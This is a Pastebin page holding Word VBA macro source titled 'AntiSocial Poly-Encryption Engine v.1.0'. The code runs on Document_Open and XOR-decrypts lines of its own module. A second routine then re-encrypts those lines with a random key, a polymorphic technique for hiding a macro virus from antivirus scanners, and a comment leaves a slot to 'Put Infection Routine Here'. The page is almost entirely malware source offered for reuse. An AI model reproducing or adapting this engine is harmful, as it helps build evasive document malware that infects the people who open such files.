Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- '
- '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- ' AntiSocial Poly-Encryption Engine v.1.0
- 'By Lys Kovick For The Alcoholic Anarchists of America (AAA)
- '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- '
- Private Sub Document_Open()
- For V1 = 17 To 28 '//Adjust V1 For Line Changes!
- V2 = Null
- V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
- V4 = Asc((Mid(V3, 2, 1)))
- V5 = V4 Xor 39
- For V6 = 3 To Len(V3)
- V7 = Asc(Mid(V3, V6, 1)) Xor V5
- V2 = V2 & Chr(V7)
- Next V6
- V8 = V2
- ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8
- Next V1
- Call VM
- End Sub
- Private Sub VM()
- For V1 = 17 To 28 '//Adjust V1 For Line Changes!
- V2 = Null
- V3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
- V4 = Int(Rnd() * 8) + 1
- For V5 = 1 To Len(V3)
- V6 = Asc(Mid(V3, V5, 1)) Xor V4
- V2 = V2 & Chr(V6)
- Next V5
- V7 = V2
- ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, "'" & V7
- Next V1
- '//Put Infection Routine Here...
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement